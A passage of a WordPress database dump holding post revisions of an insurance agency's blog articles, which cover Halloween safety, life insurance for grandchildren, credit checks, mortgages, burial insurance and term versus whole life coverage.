purchased or made are flame-resistant.</li>\r\n 	<li>Size is important. Avoid longer costumes and oversized shoes or heels to avoid tripping. Also, make sure the costume is roomy enough to compensate for layers if the night is cool.</li>\r\n 	<li>Especially during twilight and later hours, dark colors are hard to see. Opt for bright hues or add reflective tape or glow sticks to be more visible.</li>\r\n 	<li>Masks are scary and fun, but make it hard for YOU to see. Choose non-toxic makeup instead (but make sure to test it on a small area of skin first). The FDA has a list of approved color additives for cosmetic use (found <a href=\"https://www.fda.gov/Cosmetics/Labeling/IngredientNames/ucm109084.htm\" target=\"_blank\" rel=\"noopener noreferrer\">here</a>). If the colors are not included on the FDA list, avoid using that makeup.</li>\r\n 	<li>Without an actual prescription from an eye care professional, avoid colored contact lenses.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ol>\r\n<h4>Proper Pumpkin Procedures</h4>\r\n<ol>\r\n 	<li>Any carving should be done by a responsible adult.</li>\r\n 	<li>Smaller children should decorate pumpkins with paint, markers, or other craft items.</li>\r\n 	<li>Use flashlights, glow sticks, or battery-operated lights, as opposed to candles, to prevent a fire hazard.</li>\r\n 	<li>If using candles, make sure the pumpkin is on a sturdy, flat surface away from flammable objects such as curtains or other materials.</li>\r\n</ol>\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">National Safety Council </span></em><em><span style=\"font-size: 8pt;\"><a href=\"https://www.nsc.org/home-safety/tools-resources/seasonal-safety/autumn/halloween\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.nsc.org/home-safety/tools-resources/seasonal-safety/autumn/halloween</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">US Food &amp; Drug Administration </span></em><em><span style=\"font-size: 8pt;\"><a href=\"https://www.fda.gov/ForConsumers/ConsumerUpdates/ucm230283.htm\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.fda.gov/ForConsumers/ConsumerUpdates/ucm230283.htm</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">Mayo Clinic </span></em><em><span style=\"font-size: 8pt;\"><a href=\"https://www.mayoclinic.org/healthy-lifestyle/childrens-health/in-depth/halloween-safety/art-20044976\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.mayoclinic.org/healthy-lifestyle/childrens-health/in-depth/halloween-safety/art-20044976</a></span></em>\r\n\r\n&nbsp;','Halloween Safety Every Parent Should Know','','inherit','closed','closed','','315-revision-v1','','','2023-03-19 17:48:14','2023-03-19 17:48:14','',315,'http://cmdev-site1.com/?p=408',0,'revision','',0),(409,3,'2023-03-19 17:48:40','2023-03-19 17:48:40','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nBeing a grandparent is a rewarding gift, and you likely love your grandchildren as much as your own children. You may even take the same responsibilities—to ensure their future is safe and opportunistic.\r\n\r\nWith that being said, many grandparents look into life insurance, as it can provide financial protection and a legacy for their grandchildren. However, with any insurance, there comes a lot of consideration and sorting through the options.\r\n\r\nIf you’re on the fence about purchasing life insurance for your grandchildren, we’ve listed the pros and cons to help you weigh all the benefits and disadvantages.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Pros of Buying Life Insurance for Your Grandchildren</h3>\r\n<ul>\r\n 	<li><strong>High value at a low cost</strong>\r\nThe perk of buying life insurance when your grandchild is young is the value of the policy. Because young children are normally healthy and have a long future, they’re easier to insure, and premiums are typically lower. We lose insurability as we age; therefore, you could get a decent amount of coverage for less than your grandchild would pay if he or she buys coverage at an older age, such as their early 30s.</li>\r\n 	<li><strong>Steady growth in cash value</strong>\r\nIf you decide to purchase a whole life insurance policy, they typically offer cash value which accumulates for the life of the policy. This cash value could come in handy later on in your grandchild’s life should they need to use it for college or a down payment on a home.</li>\r\n 	<li><strong>Leaving a legacy</strong>\r\nDue to the hardships this generation’s grandparents endured in their lifetime, many Seniors are starting to gift life insurance to their grandchildren as a financial head start. Life insurance could act as a tool for teaching your grandchildren financial responsibility.</li>\r\n 	<li><strong>Prepared for the unthinkable</strong>\r\nFinally, a benefit of getting life insurance for your grandchildren could be the primary purpose of life insurance—to prepare for the unthinkable. In the event of your grandchild’s death, a life insurance benefit could help your children during the hardest time of their lives. Parents are often financially and emotionally unprepared for the loss of a child. Your protection can help ease the burden off the parents.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Cons of Buying Life Insurance for Your Grandchildren</h3>\r\n<ul>\r\n 	<li><strong>Children don’t have an income</strong>\r\nOne of the primary functions of life insurance is to help financially support the family being left behind, especially if the insured is the breadwinner. Children don’t have to worry about this because they are dependent on their parents. Some may see life insurance as irrelevant in this case, though the coverage helps with more than supplementing income.</li>\r\n 	<li><strong>Final expenses may not be too much of a burden</strong>\r\nLife insurance also helps cover final expenses. If a family is financially prepared for children and has a healthy savings account, they could use their savings to pay for the funeral and burial expenses for the child.</li>\r\n 	<li><strong>Traditional usage may not be needed</strong>\r\nFortunately, the risk of child mortality is relatively low. Therefore, you may not need life insurance coverage for traditional reasons such as final expenses.</li>\r\n</ul>\r\nTo reiterate, life insurance is complex, and there are several factors to consider. Ultimately, purchasing life insurance for your grandchildren depends on your priorities and desires.\r\n\r\nAt the end of the day, you’ll be able to rest easy knowing your grandchildren are prepared for whatever their future holds with your help, even beyond the grave.\r\n\r\nBefore deciding anything, we encourage you to talk to a licensed insurance professional about purchasing life insurance for your grandchildren.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.','Pros And Cons Of Purchasing Life Insurance For Your Grandchildren','','inherit','closed','closed','','318-revision-v1','','','2023-03-19 17:48:40','2023-03-19 17:48:40','',318,'http://cmdev-site1.com/?p=409',0,'revision','',0),(411,3,'2023-03-19 17:49:43','2023-03-19 17:49:43','<span style=\"font-size: 8pt;\">By Stacy Williams</span>\r\n\r\nIf you want to buy life insurance, you probably already know you’re making a decision to help protect your loved ones in the event of your passing.\r\n\r\nAs you research the type and amount of life insurance that’s right for you, you may be wondering, can getting a life insurance quote affect my credit score?\r\n\r\nIn short, the answer is no. But there might be some more info you should know.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Insurer May Check Your Credit</h3>\r\nWhen you’re in the market for a life insurance policy, the insurer may look at your credit. It’s important to note most insurance companies do not use your credit score. But they might look at events on your credit report like bankruptcy.<sup>1</sup>\r\n\r\nInsurance companies may also look at your LexisNexis risk score, which lifeant.com describes as “a composite score that looks at your credit score, driving record, and more and creates an overall rating of how risky you are to insurance companies.”<sup>1</sup> The attributes used vary significantly by company.\r\n\r\nWhen a life insurance carrier checks this data, it is an inquiry known as a soft inquiry rather than a hard inquiry.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What is a Soft Inquiry?</h3>\r\nA soft inquiry is when your credit report is checked, but your credit score is not impacted because the inquiry is not related to a specific application for credit.<sup>2</sup>\r\n\r\nA soft inquiry may happen when you check your own credit, a company checks your credit to determine if you’re qualified for preapproval offers, or a current creditor checks your credit, to name a few examples.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Life Insurance Companies Make Soft Inquiries</h3>\r\nA life insurance company checking your credit is also considered a soft inquiry. Therefore, it does not affect your credit score.<sup>2</sup> So when you’re in the process of researching or buying life insurance, the impact on your credit score (or lack thereof) isn’t something to agonize over.\r\n\r\nIt’s worth noting your credit history may have an impact on your life insurance rates.<sup>1</sup> Again, the credit data life insurers access varies by company, and each state views this information differently.\\\r\n\r\nAlso, your credit history is just one of many factors that your insurer will consider when determining your life insurance premium rates.\r\n\r\nState insurance regulators are beginning to monitor the impact of credit-based information on consumers.<sup>3</sup>\r\n\r\nIf you have any questions about your credit, contact a financial advisor. For more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Life Ant, Do You Need Good Credit to Buy Life Insurance?, 2020, <a href=\"https://www.lifeant.com/faq/do-you-need-good-credit-to-buy-life-insurance/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.lifeant.com/faq/do-you-need-good-credit-to-buy-life-insurance/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. Experian, What is a Soft Inquiry?, 2019, <a href=\"https://www.experian.com/blogs/ask-experian/what-is-a-soft-inquiry/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.experian.com/blogs/ask-experian/what-is-a-soft-inquiry/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">3. NAIC, Credit-Based Insurance Scores, 2021, <a href=\"https://content.naic.org/cipr_topics/topic_creditbased_insurance_scores.htm\" target=\"_blank\" rel=\"noopener noreferrer\">https://content.naic.org/cipr_topics/topic_creditbased_insurance_scores.htm</a></span></em>','Can Getting A Life Insurance Quote Affect My Credit Score?','','inherit','closed','closed','','324-revision-v1','','','2023-03-19 17:49:43','2023-03-19 17:49:43','',324,'http://cmdev-site1.com/?p=411',0,'revision','',0),(412,3,'2023-03-19 17:50:06','2023-03-19 17:50:06','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nWithout a doubt, life insurance is designed to help protect you and your family, making it a vital piece of your financial planning.\r\n\r\nWith life insurance evolving over the years to provide different tiers of coverage to fit an evolving set of needs, life insurance is well worth considering no matter where you are in life.\r\n\r\nIn fact, one of the main reasons people consider a life insurance purchase is due to a mortgage payment.<sup>1</sup> But is life insurance really all that important when considering purchasing a house and making mortgage payments?\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Why You Should Consider Life Insurance If You’re Looking to Buy a Home</h3>\r\nWhile having life insurance isn’t strictly a necessity when purchasing a home, that doesn’t mean it isn’t a good thing to have. Here are a few reasons to consider a life insurance purchase before buying a home:\r\n<ul>\r\n 	<li>A mortgage is most likely the biggest bill your family will have. Buying a life insurance policy that would cover your mortgage debt can help protect your interest and prevent you from having to buy additional mortgage insurance when you buy your first home.<sup>1</sup></li>\r\n 	<li>If you are the sole or primary breadwinner in your home, there is a chance that your family would not be able to continue making mortgage payments in the event of your death. A life insurance policy has the potential to provide financial security to your family in the event of your death by allowing them the possibility to keep making mortgage payments after you die.<sup>2</sup></li>\r\n 	<li>Having life insurance in place when buying a home may sway a lender to rate your application more highly. The same may apply to landlords when seeking a buy-to-let mortgage.<sup>2\r\n<span style=\"color: #ffffff;\">-</span></sup></li>\r\n</ul>\r\nWhile life insurance isn’t a necessity when buying a home, having a life insurance policy in place before proceeding with a house purchase has its share of benefits.\r\n\r\nIn some cases, having life insurance may help a lender rate your mortgage application more highly and give your family the financial security they need to continue living in their home long after your death.<sup>2</sup>\r\n\r\nThere are a number of life insurance options available, so it’s important to speak with a financial advisor or licensed insurance agent to help you decide which life insurance policy is best for you.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. The Balance, Who Needs Life Insurance? 10 Ways You Can Use Life Insurance, 2019, <a href=\"https://www.thebalance.com/who-needs-life-insurance-2645793\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.thebalance.com/who-needs-life-insurance-2645793</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. Money to the Masses, Do you need life insurance to get a mortgage?, 2019, <a href=\"https://moneytothemasses.com/quick-savings/insurance-2/life-insurance/do-you-need-life-insurance-to-get-a-mortgage\" target=\"_blank\" rel=\"noopener noreferrer\">https://moneytothemasses.com/quick-savings/insurance-2/life-insurance/do-you-need-life-insurance-to-get-a-mortgage</a></span></em>','Why Is Life Insurance Important For Someone Getting A Mortgage?','','inherit','closed','closed','','327-revision-v1','','','2023-03-19 17:50:06','2023-03-19 17:50:06','',327,'http://cmdev-site1.com/?p=412',0,'revision','',0),(413,3,'2023-03-19 17:50:32','2023-03-19 17:50:32','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nBuying life insurance doesn’t mean you have to sacrifice the quality of your coverage.\r\n\r\nIn this blog, learn five tips to help secure life insurance that fits your budget without compromising the quality of the coverage you deserve.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>5 Tips and Tricks to Finding Affordable Life Insurance\r\n<span style=\"color: #ffffff;\">-</span></h3>\r\n<ol>\r\n 	<li><img class=\"alignleft size-medium wp-image-337\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-300x283.jpg\" alt=\"\" width=\"300\" height=\"283\" />Choose the best life insurance policy for your situation. Understanding what you and your family need is one of the first steps toward finding coverage. Consider your family’s unique set of needs and history, as well as all of your financial obligations. In doing so, you can help ensure that you select the right amount of coverage to fit your family’s needs while giving you the tools necessary to responsibly estimate the amount of coverage available for your financial situation.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Buy life insurance as early as possible. Life insurance may be significantly cheaper the younger you are when you purchase it. With increased age comes increased health risks, all of which can influence the premium rate of your policy. In fact, life insurance policy rates rise an average of eight to ten percent each year you put off applying.<sup>1</sup> To give yourself the best chance in finding a life insurance policy, buy early. This way, you may be able to lock in the same premium rates you have at a younger age for the duration of the policy—saving you money for years to come.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Use quote websites wisely. One of the fastest ways to review what type of life insurance may best fit your financial situation is through the use of a quote website. Quote websites are particularly useful as they provide users with a quick and easy way to view their life insurance options and possible costs. Make sure your quote websites compare quotes from multiple insurers to give yourself the best start!\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Consider a term life insurance policy—especially for those over 50 years of age. For those older in age, one may want to consider purchasing a term life insurance policy. A term life policy is often less expensive than a whole life insurance policy and typically only provides a death benefit in the event of the insured’s death so long as the death occurs during the duration of the policy.<sup>1</sup> However, despite term life policies lacking certain features associated with whole life, it doesn’t mean that term life policies are bad. In fact, term life policies have long been a viable option for young people and older generations alike and are well worth considering.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Work with an independent broker. Knowing how to get a life insurance policy is important, but so is recognizing when you need help in deciding on one. An independent broker can help inform you of life insurance products you should consider, provide valuable information on certain insurers, and help guide you through the process with ease. If you’re having trouble deciding on a policy—or just want some extra help—phoning your local, independent broker may be the best decision you make.</li>\r\n</ol>\r\nFinding life insurance doesn’t have to be difficult, but it does require a little bit of work.\r\n\r\nBy following these five tips and tricks, you can help improve your chances of finding the best life insurance policy to fit your needs without breaking the bank.\r\n\r\nRemember to do your research, weigh your options, compare your quotes wisely, and reach out for help when you need it most.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Investopedia, How Age Affects Life Insurance Rates, 2019, <a href=\"https://www.investopedia.com/articles/personal-finance/022615/how-age-affects-life-insurance-rates.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/personal-finance/022615/how-age-affects-life-insurance-rates.asp</a></span></em>','5 Tips For Finding Life Insurance That Fits Your Budget','','inherit','closed','closed','','333-revision-v1','','','2023-03-19 17:50:32','2023-03-19 17:50:32','',333,'http://cmdev-site1.com/?p=413',0,'revision','',0),(414,3,'2023-03-19 17:50:58','2023-03-19 17:50:58','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nIf you died tomorrow, how would your family pay for your burial? According to the World Population Review, the average cost of a funeral in 2020 is between $7,000 and $9,000.<sup>1</sup>\r\n\r\nWhile the change in cost may not seem like much to a grieving family, the price tag may be overwhelming—which is where burial insurance comes in to help lessen the cost.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What is Burial Insurance?</h3>\r\nBurial insurance often has different names to help soften its purpose, including but not limited to “final expense,” “memorial,” and “pre-need” insurance.<sup>2</sup> However, no matter the name, burial insurance is designed to help families pay for burial costs and tie up any financial lose ends the deceased may have.\r\n\r\nBurial insurance is offered by an array of life insurance companies and offers benefits up to a certain limit. This limit is designed to help pay for burial or cremation costs that may cost upwards of thousands of dollars—helping families put their loved ones to rest with minimal financial stress.<sup>1</sup>\r\n\r\nSince burial insurance policies differ by provider, you may find those burial insurance policies offered in the form of term or whole life, depending on who you speak to.<sup>3</sup>\r\n\r\nGenerally speaking, the death benefit for a burial insurance policy is low-ranging anywhere from $5,000 to $25,000 on average, though others may have higher benefits.<sup>3</sup>\r\n\r\nAfter the death of the insured, the beneficiary or beneficiaries listed can use the death benefit provided by the policy to pay for whatever they see fit. This may include funeral expenses, outstanding medical bills, legal costs, or any outstanding debts.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What You Should Know About Burial Insurance</h3>\r\nDespite burial insurance typically being marketed towards seniors, burial insurance can be purchased for anyone at any age.\r\n\r\nIn fact, burial insurance is often presented as “easy to get,” with some providers of burial insurance not even asking for a completed medical exam to qualify.<sup>2</sup>\r\n\r\nWhile burial insurance policies don’t offer high death benefits, their low to mid-range death benefits can help families pay for an array of costs while remaining affordable—making it a compelling sell for those looking to provide financial security for their family at an affordable price.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>To Summarize</h3>\r\nBurial insurance can be a valuable asset for those looking for a way to help pay for their burial expenses without burdening themselves or their family.\r\n\r\nHowever, since there is such an array of burial insurance providers and policies available at any given time, it’s essential you do your research before committing to a single policy.\r\n\r\nBy evaluating your needs, the needs of your family, and your options, you’ll be equipped to make the best possible decision about burial insurance.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. World Population Review, Average Funeral Cost by State 2020, 2020, <a href=\"http://worldpopulationreview.com/states/average-funeral-cost-by-state/\" target=\"_blank\" rel=\"noopener noreferrer\">http://worldpopulationreview.com/states/average-funeral-cost-by-state/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. Investopedia, Burial Insurance vs. Life Insurance: What’s the Difference?, 2019, <a href=\"https://www.investopedia.com/articles/personal-finance/111314/burial-insurance-vs-life-insurance.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/personal-finance/111314/burial-insurance-vs-life-insurance.asp</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">3. Protective, Types of Life Insurance for Funeral Costs, n.p., <a href=\"https://www.protective.com/learning-center/life-insurance/life-insurance-basics/is-burial-insurance-different-from-preneed-funeral-insurance/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.protective.com/learning-center/life-insurance/life-insurance-basics/is-burial-insurance-different-from-preneed-funeral-insurance/</a></span></em>','What Is Burial Insurance?','','inherit','closed','closed','','343-revision-v1','','','2023-03-19 17:50:58','2023-03-19 17:50:58','',343,'http://cmdev-site1.com/?p=414',0,'revision','',0),(417,3,'2023-03-21 13:00:20','2023-03-21 13:00:20','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nWhole life, term life...what’s the difference? Many consumers draw a blank when it comes to identifying the differences between these two common types of life insurance. What may be even more confusing?\r\n\r\nKnowing how much you might pay for one type of insurance over the other.\r\n\r\nIn this article, we’ll explore the differences between whole life insurance and term life insurance and the cost differences between them.\r\n<h3>What is the Difference Between Term and Whole Life Insurance?</h3>\r\nTerm life insurance covers the insured for a specified length of time. The timeframe of coverage varies from policy to policy.\r\n\r\nWhole life insurance covers the insured for the length of their life—given that premiums are paid and other terms of the policy are met. Rather than protecting you up to a certain age or for a certain length of time as term life insurance does, a whole life policy wouldn’t necessarily expire just because you’ve reached a certain age or a certain amount of time has elapsed.\r\n\r\nWhether you choose a term life policy or a whole life policy depends on a number of factors and your personal needs when it comes to protection.\r\n\r\nWhen weighing the options between the two, it’s best to reach out to your financial advisor or a life insurance agent for more specific guidance.\r\n<h3>What are the Benefits of Each?</h3>\r\nAlthough term life policies are for a specified length of time, in some cases the insured may have the option to either renew the policy or convert it into a whole life policy in the event the term passes without the insured’s death.\r\n\r\nThis new policy may be subject to new terms, coverage, and premium rates. This depends on the insurance carrier and the specific terms of coverage in the policy.\r\n\r\nOne popular benefit of a whole life policy is cash value, which is the monetary amount that accumulates as the policy matures over time. This benefit is separate from the death benefit beneficiaries receive once the insured passes away.\r\n\r\nThe cash value is a fund the insured can tap into as a withdrawal of funds or a loan against the policy. The policyholder can use this benefit while they are living, depending on the specific rules of the policy.\r\n<h3>What’s the Price Difference?</h3>\r\nGenerally speaking, whole life insurance policy premiums are often more expensive than term life policies, even for the same amount of face-value coverage.\r\n\r\nThe primary reason is that term life coverage is for a specified length of time, rather than for the life of the insured (with specific stipulations) as is the case with whole life insurance.\r\n\r\nThe dollar amount you can pay will vary from policy to policy, so it’s important to look at all the benefits, term limits, and other details of individual policies that are important to you and your family when it comes to protection.\r\n\r\nChoosing the right, most cost-effective life insurance policy can be a daunting task for many consumers. That’s why it’s important to know what cost considerations and policy benefits you may face when you choose one policy type over another.\r\n\r\nBe sure to consult with a financial advisor or life insurance agent or consult one of our licensed insurance professionals at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">email</a> us for more help determining the right type of coverage for you.','How Much Should I Pay For Whole Life Insurance vs Term Life Insurance?','','inherit','closed','closed','','416-revision-v1','','','2023-03-21 13:00:20','2023-03-21 13:00:20','',416,'http://cmdev-site1.com/?p=417',0,'revision','',0),(418,3,'2023-03-21 13:01:19','2023-03-21 13:01:19','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nWhole life, term life...what’s the difference? Many consumers draw a blank when it comes to identifying the differences between these two common types of life insurance. What may be even more confusing?\r\n\r\nKnowing how much you might pay for one type of insurance over the other.\r\n\r\nIn this article, we’ll explore the differences between whole life insurance and term life insurance and the cost differences between them.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What is the Difference Between Term and Whole Life Insurance?</h3>\r\nTerm life insurance covers the insured for a specified length of time. The timeframe of coverage varies from policy to policy.\r\n\r\nWhole life insurance covers the insured for the length of their life—given that premiums are paid and other terms of the policy are met. Rather than protecting you up to a certain age or for a certain length of time as term life insurance does, a whole life policy wouldn’t necessarily expire just because you’ve reached a certain age or a certain amount of time has elapsed.\r\n\r\nWhether you choose a term life policy or a whole life policy depends on a number of factors and your personal needs when it comes to protection.\r\n\r\nWhen weighing the options between the two, it’s best to reach out to your financial advisor or a life insurance agent for more specific guidance.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What are the Benefits of Each?</h3>\r\nAlthough term life policies are for a specified length of time, in some cases the insured may have the option to either renew the policy or convert it into a whole life policy in the event the term passes without the insured’s death.\r\n\r\nThis new policy may be subject to new terms, coverage, and premium rates. This depends on the insurance carrier and the specific terms of coverage in the policy.\r\n\r\nOne popular benefit of a whole life policy is cash value, which is the monetary amount that accumulates as the policy matures over time. This benefit is separate from the death benefit beneficiaries receive once the insured passes away.\r\n\r\nThe cash value is a fund the insured can tap into as a withdrawal of funds or a loan against the policy. The policyholder can use this benefit while they are living, depending on the specific rules of the policy.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What’s the Price Difference?</h3>\r\nGenerally speaking, whole life insurance policy premiums are often more expensive than term life policies, even for the same amount of face-value coverage.\r\n\r\nThe primary reason is that term life coverage is for a specified length of time, rather than for the life of the insured (with specific stipulations) as is the case with whole life insurance.\r\n\r\nThe dollar amount you can pay will vary from policy to policy, so it’s important to look at all the benefits, term limits, and other details of individual policies that are important to you and your family when it comes to protection.\r\n\r\nChoosing the right, most cost-effective life insurance policy can be a daunting task for many consumers. That’s why it’s important to know what cost considerations and policy benefits you may face when you choose one policy type over another.\r\n\r\nBe sure to consult with a financial advisor or life insurance agent or consult one of our licensed insurance professionals at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">email</a> us for more help determining the right type of coverage for you.','How Much Should I Pay For Whole Life Insurance vs Term Life Insurance?','','inherit','closed','closed','','416-revision-v1','','','2023-03-21 13:01:19','2023-03-21 13:01:19','',416,'http://cmdev-site1.com/?p=418',0,'revision','',0),(419,3,'2023-03-21 13:13:00','0000-00-00 00:00:00','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nBuying life insurance doesn’t mean you have to sacrifice the quality of your coverage. In this blog, learn five tips to help secure life insurance that fits your budget without compromising the quality of the coverage you deserve.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3><img class=\"alignleft size-medium wp-image-337\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-300x283.jpg\" alt=\"\" width=\"300\" height=\"283\" />5 Tips and Tricks to Finding Affordable Life Insurance</h3>\r\n<ol>\r\n 	<li>Choose the best life insurance policy for your situation. Understanding what you and your family needs is one of the first steps toward finding coverage. Consider your family’s unique set of needs and history, as well as all of your financial obligations. In doing so, you can help ensure that you select the right amount of coverage to fit your family’s needs while giving you the tools necessary to responsibly estimate the amount of coverage available for your financial situation.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Buy life insurance as early as possible. Life insurance may be significantly cheaper the younger you are when you purchase it. With increased age comes increased health risks, all of which can influence the premium rate of your policy. In fact, life insurance policy rates rise an average of eight to ten percent each year you put off applying.<sup>1</sup> To give yourself the best chance in finding a life insurance policy, buy early. This way you may be able to lock in the same premium rates you have at a younger age for the duration of the policy—saving you money for years to come.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Use quote websites wisely. One of the fastest ways to review what type of life insurance may best fit your financial situation is through the use of a quote website. Quote websites are particularly useful as they provide users with a quick and easy way to view their life insurance options and possible costs. Make sure your quote website compares quotes from multiple insurers to give yourself the best start!\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Consider a term life insurance policy—especially for those over 50 years of age. For those older in age, one may want to consider purchasing a term life insurance policy. A term life policy is often less expensive than a whole life insurance policy and typically only provides a death benefit in the event of the insured’s death so long as the death occurs during the duration of the policy.<sup>1</sup> However, despite term life policies lacking certain features associated with whole life it doesn’t mean that term life policies are bad. In fact, term life policies have long been a viable option for young people and older generations alike, and are well worth considering.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Work with an independent broker. Knowing how to get a life insurance policy is important, but so is recognizing when you need help in deciding on one. An independent broker can help inform you of life insurance products you should consider, provide valuable information on certain insurers, and help guide you through the process with ease. If you’re having trouble deciding on a policy—or just want some extra help—phoning your local, independent broker may be the best decision you make.</li>\r\n</ol>\r\nFinding life insurance doesn’t have to be difficult, but it does require a little bit of work. By following these five tips and tricks you can help improve your chances of finding the best life insurance policy to fit your needs without breaking the bank.\r\n\r\nRemember to do your research, weigh your options, compare your quotes wisely, and reach out for help when you need it most.\r\n\r\nYou can consult one of our licensed insurance professionals at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">email</a> us for more help determining the right type of coverage for you.\r\n\r\n<span style=\"font-size: 8pt;\"><em>Sources:\r\n</em></span><span style=\"font-size: 8pt;\"><em>1. Investopedia, How Age Affects Life Insurance Rates, 2019, <a href=\"https://www.investopedia.com/articles/personal-finance/022615/how-age-affects-life-insurance-rates.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/personal-finance/022615/how-age-affects-life-insurance-rates.asp</a></em></span>','5 Tips For Finding Life Insurance That Fits Your Budget','','draft','open','open','','','','','2023-03-21 13:13:00','2023-03-21 13:13:00','',0,'http://cmdev-site1.com/?p=419',0,'post','',0),(420,3,'2023-03-21 13:11:11','2023-03-21 13:11:11','Piggy bank and calculator on white background. Savings and budget concept','Savings and budget concept with piggy bank','','inherit','open','closed','','savings-and-budget-concept-with-piggy-bank','','','2023-03-21 13:11:25','2023-03-21 13:11:25','',419,'http://cmdev-site1.com/wp-content/uploads/2023/03/Savings-and-budget-concept-with-piggy-bank-1000x666-1.jpg',0,'attachment','image/jpeg',0),(421,3,'2023-03-21 13:12:23','2023-03-21 13:12:23','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nBuying life insurance doesn’t mean you have to sacrifice the quality of your coverage. In this blog, learn five tips to help secure life insurance that fits your budget without compromising the quality of the coverage you deserve.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3><img class=\"alignleft size-medium wp-image-337\" 